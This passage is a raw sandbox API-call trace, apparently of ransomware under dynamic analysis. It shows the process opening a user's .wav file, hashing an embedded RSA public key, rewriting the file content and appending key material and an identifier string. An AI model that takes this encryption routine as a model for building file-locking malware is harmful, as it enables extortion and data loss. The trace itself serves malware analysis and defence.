(pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\rQWnqazpz-naoLL5P.wav") returned=".wav" [0198.173] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\rQWnqazpz-naoLL5P.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\yw2t95\\rqwnqazpz-naoll5p.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0198.174] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=97403) returned 1 [0198.174] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0198.177] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x17c55, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.177] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0198.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0198.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.179] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.179] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x17c7b, lpOverlapped=0x0) returned 1 [0198.181] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0198.181] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.181] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.181] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea898) returned 1 [0198.182] CryptCreateHash (in: hProv=0x6ea898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0198.182] CryptHashData (hHash=0x2cbfad0, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.182] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0198.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0198.183] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0198.183] GetLastError () returned 0x0 [0198.183] CryptDestroyHash (hHash=0x2cbfad0) returned 1 [0198.183] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0198.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0198.183] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0198.183] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0198.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.183] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0198.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0198.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x17c80) returned 0x2d51778 [0198.184] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0198.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0198.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0198.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d5e0 [0198.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4c8 [0198.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d628 [0198.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4e0 [0198.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a510 [0198.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a570 [0198.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a528 [0198.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0198.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0198.185] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0198.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0198.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a510 | out: hHeap=0x6a0000) returned 1 [0198.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a528 | out: hHeap=0x6a0000) returned 1 [0198.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a570 | out: hHeap=0x6a0000) returned 1 [0198.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0198.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a570 [0198.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0198.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a528 [0198.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0198.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a510 [0198.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0198.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0198.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0198.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0198.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0198.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0198.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0198.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0198.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0198.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a528 | out: hHeap=0x6a0000) returned 1 [0198.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a510 | out: hHeap=0x6a0000) returned 1 [0198.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0198.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0198.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a570 | out: hHeap=0x6a0000) returned 1 [0198.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0198.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0198.188] GetCurrentThreadId () returned 0x264 [0198.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0198.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4c2d0 [0198.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0198.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0198.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0198.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0198.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0198.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0198.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.189] GetCurrentThreadId () returned 0x264 [0198.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0198.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0198.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0198.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0198.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0198.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0198.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0198.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0198.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a570 [0198.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0198.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0198.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0198.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0198.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0198.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0198.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0198.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0198.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a510 [0198.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0198.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0198.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0198.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0198.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0198.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0198.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0198.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a528 [0198.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0198.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0198.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0198.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4f8 [0198.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0198.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a588 [0198.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0198.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0198.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0198.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a558 [0198.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0198.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a540 [0198.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0198.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a5a0 [0198.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a540 | out: hHeap=0x6a0000) returned 1 [0198.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a540 [0198.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a558 | out: hHeap=0x6a0000) returned 1 [0198.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0198.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0198.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0198.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0198.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0198.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a510 | out: hHeap=0x6a0000) returned 1 [0198.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a510 [0198.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0198.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0198.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a570 | out: hHeap=0x6a0000) returned 1 [0198.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0198.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5a0 | out: hHeap=0x6a0000) returned 1 [0198.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0198.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0198.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0198.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0198.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a510 | out: hHeap=0x6a0000) returned 1 [0198.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0198.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0198.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0198.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0198.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0198.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0198.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0198.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0198.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0198.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0198.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0198.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a540 | out: hHeap=0x6a0000) returned 1 [0198.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a588 | out: hHeap=0x6a0000) returned 1 [0198.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0198.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a528 | out: hHeap=0x6a0000) returned 1 [0198.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4f8 | out: hHeap=0x6a0000) returned 1 [0198.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0198.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0198.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0198.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4e0 | out: hHeap=0x6a0000) returned 1 [0198.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d628 | out: hHeap=0x6a0000) returned 1 [0198.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0198.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0198.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0198.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0198.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0198.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0198.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0198.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0198.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0198.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0198.202] WriteFile (in: hFile=0x52c, lpBuffer=0x2d51778*, nNumberOfBytesToWrite=0x17c76, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d51778*, lpNumberOfBytesWritten=0x30ffb14*=0x17c76, lpOverlapped=0x0) returned 1 [0198.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d51778 | out: hHeap=0x6a0000) returned 1 [0198.204] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x17c7b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.204] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0198.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0198.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0198.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0198.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0198.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0198.206] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0198.207] HeapFree (in: 